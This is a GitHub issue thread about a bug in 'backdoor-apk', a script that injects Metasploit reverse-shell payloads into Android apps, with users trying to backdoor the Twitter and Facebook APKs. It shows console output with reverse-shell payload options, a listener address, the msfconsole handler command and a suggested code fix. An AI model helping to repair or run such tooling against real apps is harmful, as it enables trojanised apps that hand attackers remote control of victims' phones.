search

dana-at-cp / backdoor-apk

backdoor-apk is a shell script that simplifies the process of adding a backdoor to any Android APK file. Users of this shell script should have working knowledge of Linux, Bash, Metasploit, Apktool, the Android SDK, smali, etc. This shell script is provided as-is without warranty of any kind and is intended for educational purposes only.
Apache License 2.0
2.2k stars 699 forks source link

Failed to locate smali file to hook in multidex APK #75

Closed LuisMayo closed 7 years ago

LuisMayo commented 7 years ago

I was just trying this with the Twitter APK but it didn't work:

Console output:

root@kali:~/android-backdoor/backdoor-apk/backdoor-apk# ./backdoor-apk.sh twitter-6-32-0.apk 

     / ______ \
     || _  _ ||
     ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
     |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
     || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
     ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
     |||_||_|||         AAA  AAA  PPP       KKK  KKK
     ||______||         AAA  AAA  PPP       KKK  KKK
    /__________\

____|__|__ /____\ |____| Dana James Traversie

[] Running backdoor-apk.sh v0.1.9 on vie feb 3 16:28:59 CET 2017 [+] Android payload options: 1) meterpreter/reverse_http 4) shell/reverse_http 2) meterpreter/reverse_https 5) shell/reverse_https 3) meterpreter/reverse_tcp 6) shell/reverse_tcp [?] Please select an Android payload option: 3 [?] Please enter an LHOST value: 192.168.0.207 [?] Please enter an LPORT value: 7777 [+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc [] Generating RAT APK file...done. [] Decompiling RAT APK file...done. [] Decompiling original APK file...done. [] Merging permissions of original and payload projects...done. [] Running proguard on RAT APK file...done. [] Decompiling obfuscated RAT APK file...done. [] Creating new directories in original project for RAT smali files...done. [] Copying RAT smali files to new directories in original project...done. [] Fixing RAT smali files...done. [] Obfuscating const-string values in RAT smali files...done. [] Locating smali file to hook in original project...done. [!] Failed to locate smali file to hook

run.log contents: https://ghostbin.com/paste/uqh5o

I'm going to try with a different APK just for testing Regards.

Abdulmalik5371 commented 7 years ago

I have same issue when trying to backdoor Facebook apk and also the facebook messenger app....kindly help

dana-at-cp commented 7 years ago

@TLuigi003 I confirmed this is a bug that is reproducible with the Twitter APK.

@Abdulmalik5371 I'm not sure about Facebook APKs at this time but I bet it's the same issue. I'll confirm soon.

Thanks for the reports.

Abdulmalik5371 commented 7 years ago

@dana-at-cp thanx for the early response...i appreciate it.

dana-at-cp commented 7 years ago

The problem is that the current code correctly identifies the smali file to hook via the AndroidManifest.xml file but fails to search all of the smali file class directories.

For example, the Twitter APK decompiles into three smail file class directories:

  1. smali
  2. smali_classes2
  3. smali_classes3

The current code searches the 'smali' directory for the expected smali file but it actually exists in the 'smali_classes2' directory.

This bug affects any multidex APK where the smali file to hook is not in the 'smali' directory.

More on multidex APKs: https://developer.android.com/studio/build/multidex.html

y3lin4ung commented 7 years ago

I am not sure about your answer, Mr. dana-at-cp . How do we pass that "fail to locate smali file to hook" error! Thz!

LuisMayo commented 7 years ago

@YaRMa not a fix but a workaround may be changing the line 441 of the backdoor-apk.sh from smali_file_to_hook=$MY_PATH/original/smali/$total_package$tmp.smali to smali_file_to_hook=$MY_PATH/original/smali_classes2/$total_package$tmp.smali

(It may differ in the case of facebook apk)

I haven't tested this but I would try that while we wait for a proper solution

Regards.

LuisMayo commented 7 years ago

@YaRMa It doesn't work, after replacing every reference to smali with smali_classes2 the script continues but it fails at recompiling the original project. So probably we need to wait until a proper patch is done.

Or make it ourselves :P

dana-at-cp commented 7 years ago

@TLuigi003 @YaRMa Simply replacing every instance of "smali" with "smali_classes2" is not the proper fix and undoubtedly resulted in other breakage. Hang tight. I'll have a new release out soon.

dana-at-cp commented 7 years ago

@TLuigi003 @YaRMa I have a fix created. I'll cut a new release in the next day or so.

defcony commented 7 years ago

where can i find the patch??

dana-at-cp commented 7 years ago

@defcony A new version is coming ... I've been busy with other things unfortunately.

dana-at-cp commented 7 years ago

@TLuigi003 @Abdulmalik5371 @YaRMa @defcony This bug is now fixed on master.

glenn2148 commented 6 years ago

looks like it never came, lol

empt1xo commented 6 years ago

seems like they forgot to fix this 🤔, lol

irfankhan090 commented 5 years ago

I'm still waiting after 2 years.

LuisMayo commented 5 years ago

I didn't get to try again if it was indeed fixed, I can't believe it have already been 2 years. I'll check when I have time

delgiu87 commented 4 years ago

someone fix the problem? still now same error. we lose time to follow fake sw?

MrFey commented 4 years ago

UP!

ll3N1GmAll commented 4 years ago

Still seeing this issue on numerous apks